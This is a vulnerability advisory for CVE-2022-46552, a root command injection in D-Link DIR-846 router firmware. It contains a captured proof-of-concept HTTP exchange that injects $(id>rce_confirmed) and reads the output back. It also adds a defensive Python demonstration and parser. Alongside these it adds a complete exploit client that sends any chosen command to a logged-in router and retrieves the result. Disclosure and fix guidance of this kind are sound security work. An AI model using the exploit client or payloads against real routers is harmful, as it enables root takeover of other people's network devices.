CVE-2022-46552: D-Link DIR-846 wireless router firmware FW100A53DBR-Retail contains an OS command injection that leads to authenticated RCE
1. Vulnerability Information
Authors: Françoa Taffarel Rosário Corrêa, Osmany Barros de Freitas and Lourenço Alves Pereira Junior.
Affiliation: Aeronautics Institute of Technology (ita.br)
Common Weakness Enumeration: CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Vulnerability Description: D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.
Vulnerability detail: The flaw is an OS command injection through authenticated user input containing shell special characters. The file SetIpMacBindSettings.php (line 79) passes only partially sanitized user input to an exec function, so an attacker can execute arbitrary commands by sending a maliciously crafted payload in a POST request. The HTTP message body is JSON-encoded and carries the lan(0)_dhcps_staticlist key, whose value is a string of comma-separated values. The attacker places the malicious payload in the second value, which leads the web server on the D-Link DIR-846 to invoke exec(changename.sh $mac "$(malicious_payload_command)") on the host system; because exec hands that string to the shell, the $(...) command substitution runs the payload before changename.sh is even called. Valid credentials for the web interface are required, and the web server runs as root, so a successful injection yields a root shell on the device.
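The injection and its fix, as an added example that is not firmware code and not from the advisory's authors: the unsafe pattern is rebuilt as a shell command line and run through /bin/sh with printf standing in for changename.sh, to show that a "$(...)" inside double quotes is evaluated rather than printed; next to it is a strict parser for the binding string and an argv-based invocation in which the same value is inert. The field order enable-flag, device name, MAC, IPv4 is an assumption read off the PoC value on this page (the page only says the injected value is the second field); the names parse_binding, safe_argv and the demo helpers are this example's own. In PHP the equivalent fix is to validate each field against a strict format and wrap anything that still reaches exec() in escapeshellarg().

```python
"""Vulnerable shell-string construction vs. a validated, shell-free invocation.
Added example for CVE-2022-46552; not the DIR-846 firmware's code."""
import ipaddress
import re
import subprocess

# MAC address from the advisory's PoC, reused as the fixed first argument in the demos.
MAC = "02:42:d6:f9:dc:4e"

# Assumed formats (the page does not document them): enable flag 0/1, a DNS-label-like
# device name, a colon-separated MAC, a dotted-quad IPv4 address.
_MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}")
_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,62}")


def vulnerable_command_line(mac, name):
    """Shape of the call the advisory describes: exec(changename.sh $mac "$name").
    Quoting the name does not help: the string is parsed by /bin/sh, and $(...) is
    expanded inside double quotes."""
    return f'changename.sh {mac} "{name}"'


def demo_shell_expansion(name):
    """Run the vulnerable line through sh with printf in place of changename.sh.
    With name='$(echo INJECTED)' the output contains INJECTED, i.e. the command ran."""
    line = vulnerable_command_line(MAC, name).replace("changename.sh", "printf '%s %s\\n'", 1)
    done = subprocess.run(["sh", "-c", line], capture_output=True, text=True)
    return done.stdout.strip()


def demo_no_shell(name):
    """Same stand-in, but the untrusted value is passed as a positional argument ($2),
    so the shell expands "$2" to the literal text and nothing inside it is evaluated."""
    done = subprocess.run(
        ["sh", "-c", 'printf "%s %s\\n" "$1" "$2"', "sh", MAC, name],
        capture_output=True, text=True,
    )
    return done.stdout.strip()


def parse_binding(value):
    """Strict parser for one 'enable,name,mac,ip' row of lan(0)_dhcps_staticlist.
    Anything that is not exactly four well-formed fields raises ValueError, so shell
    metacharacters never reach a command line."""
    fields = value.split(",")
    if len(fields) != 4:
        raise ValueError(f"expected 4 fields, got {len(fields)}: {value!r}")
    enable, name, mac, ip = fields
    if enable not in ("0", "1"):
        raise ValueError(f"bad enable flag {enable!r}")
    if not _NAME_RE.fullmatch(name):
        raise ValueError(f"bad device name {name!r}")
    if not _MAC_RE.fullmatch(mac):
        raise ValueError(f"bad MAC address {mac!r}")
    ipaddress.IPv4Address(ip)  # AddressValueError (a ValueError) on anything odd
    return {"enable": enable == "1", "name": name, "mac": mac.lower(), "ip": ip}


def safe_argv(binding, helper="changename.sh"):
    """argv for the helper.  Passed with shell=False this goes straight to execve():
    even a name containing $(...) would be one literal argument."""
    return [helper, binding["mac"], binding["name"]]


def run_helper(binding, helper="changename.sh"):
    return subprocess.run(safe_argv(binding, helper), shell=False,
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    payload = "$(echo INJECTED)"
    print("shell string :", demo_shell_expansion(payload))   # INJECTED appears: executed
    print("argv         :", demo_no_shell(payload))          # printed literally
    for row in ("1,laptop,02:42:D6:F9:DC:4E,192.168.0.15",
                "1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"):
        try:
            print("accepted:", safe_argv(parse_binding(row)))
        except ValueError as exc:
            print("rejected:", exc)
```

The two printf demos need only /bin/sh; run the file to see the first print INJECTED and the second print the $(...) text unchanged. The parser rejects the advisory's payload on the device-name check before any command is built, and run_helper never spawns a shell, so the two defences are independent.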
Vendor of the product: D-LINK
Affected product: DIR-846
Affected Version: Firmware DIR846enFW100A53DBR-Retail
Vulnerability Score (CVSS v3.1): 9.1 Critical, vector AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Dates (DD/MM/YYYY):
Vulnerability discovered: 30/11/2022
First attempt to contact vendor: 01/12/2022
CVE ID requested (MITRE): 01/12/2022
Record created (MITRE): 05/12/2022
First vendor response: 08/12/2022
CVE Assignment Team response: 10/01/2023
Second attempt to contact vendor: 01/12/2022
CVE published in the CVE List:
2. Proof of Concept
Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter (Authenticated)
Google Dork: NA
Date: 30/01/2023
Exploit Author: Françoa Taffarel
Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suporte
Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
Version: DIR846enFW100A53DBR-Retail
Tested on: D-LINK DIR-846
CVE: CVE-2022-46552
D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.
Malicious POST Request
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4
{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
Response
HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68
{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
Retrieving the command output: the injected id>rce_confirmed redirected the output of id into a file that lighttpd then serves at /HNAP1/rce_confirmed, so a plain GET confirms the command ran and as which user
GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35
uid=0(root) gid=0(root)
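The two-step exchange above as a small client, added here as an example rather than the advisory's own tooling: build the JSON body with the command substitution in the second comma-separated field, send it as the SetIpMacBindSettings HNAP call with the headers shown in the capture, then fetch the file the redirected output landed in. The session cookie must come from a browser already logged in to the router, exactly as in the PoC. The hnap_auth function is an assumption: the page only shows a captured HNAP_AUTH header, and this code derives it the way D-Link's HNAP1 web UI JavaScript commonly does (HMAC-MD5 keyed with the PrivateKey cookie over timestamp plus quoted SOAPAction); confirm that against the firmware's JavaScript before relying on it, or pass a captured header instead. Host, MAC and IP defaults are the values from the capture.

```python
"""Authenticated PoC client for CVE-2022-46552 (added example, not the advisory's code).
Network I/O happens only in exploit()/main(); the builders are pure so they can be checked offline."""
import hashlib
import hmac
import json
import sys
import time
import urllib.request

HNAP_NS = "http://purenetworks.com/HNAP1/"


def build_payload(cmd, mac, ip, enable="1"):
    """JSON body with $(cmd) in the second comma-separated field, the position the
    advisory identifies as reaching exec().  A comma would shift the fields and a
    double quote would close the quoting shown around that field, so both are refused
    instead of producing a payload that silently fails."""
    if "," in cmd or '"' in cmd:
        raise ValueError("command must not contain ',' or '\"'")
    staticlist = f"{enable},$({cmd}),{mac},{ip}"
    body = {"SetIpMacBindSettings": {"lan_unit": "0",
                                     "lan(0)_dhcps_staticlist": staticlist}}
    return json.dumps(body, separators=(",", ":"))


def private_key_from_cookie(cookie):
    """Pull PrivateKey out of a captured Cookie header such as the one in the PoC."""
    pairs = (kv.strip().split("=", 1) for kv in cookie.split(";") if "=" in kv)
    return dict(pairs)["PrivateKey"]


def hnap_auth(private_key, action, timestamp_ms=0):
    """ASSUMPTION, not documented on this page: HNAP_AUTH = upper-hex
    HMAC-MD5(PrivateKey, "<timestamp>\"<SOAPAction>\"") + " " + <timestamp>, with the
    timestamp in milliseconds (mod 2e12 as in D-Link's UI code).  Verify against the
    firmware's JavaScript; the captured header above only shows the resulting shape."""
    ts = timestamp_ms or int(time.time() * 1000) % 2000000000000
    soap_action = f'"{HNAP_NS}{action}"'
    digest = hmac.new(private_key.encode(), f"{ts}{soap_action}".encode(), hashlib.md5)
    return f"{digest.hexdigest().upper()} {ts}"


def soap_request(host, action, body, cookie, auth_header):
    """The POST as captured: JSON body, SOAPACTION and HNAP_AUTH headers, session cookie."""
    req = urllib.request.Request(f"http://{host}/HNAP1/", data=body.encode(), method="POST")
    req.add_header("Content-Type", "application/json")
    req.add_header("SOAPACTION", f'"{HNAP_NS}{action}"')
    req.add_header("HNAP_AUTH", auth_header)
    req.add_header("Cookie", cookie)
    return req


def exploit(host, cookie, cmd, outfile="rce_confirmed", auth_header=None,
            mac="02:42:d6:f9:dc:4e", ip="192.168.0.15"):
    """Run cmd with stdout redirected into outfile next to the HNAP scripts, then read it
    back over HTTP the way the PoC does.  auth_header may be a captured HNAP_AUTH value."""
    action = "SetIpMacBindSettings"
    if auth_header is None:
        auth_header = hnap_auth(private_key_from_cookie(cookie), action)
    body = build_payload(f"{cmd}>{outfile}", mac, ip)
    with urllib.request.urlopen(soap_request(host, action, body, cookie, auth_header),
                                timeout=10) as resp:
        result = json.loads(resp.read())
    status = result.get("SetIpMacBindSettingsResponse", {}).get("SetIpMacBindSettingsResult")
    if status != "OK":
        raise RuntimeError(f"unexpected HNAP response: {result}")
    with urllib.request.urlopen(f"http://{host}/HNAP1/{outfile}", timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Usage: python3 poc.py 192.168.0.1 'PHPSESSID=...; uid=...; PrivateKey=...; timeout=4' id
    host, cookie, cmd = sys.argv[1:4]
    print(exploit(host, cookie, cmd))
```

Against the capture above, build_payload reproduces the request body byte for byte, and the response check mirrors the {"SetIpMacBindSettingsResult":"OK"} the router returned. If the router rejects a computed HNAP_AUTH, pass the header value captured from the browser as auth_header; the rest of the flow is unchanged.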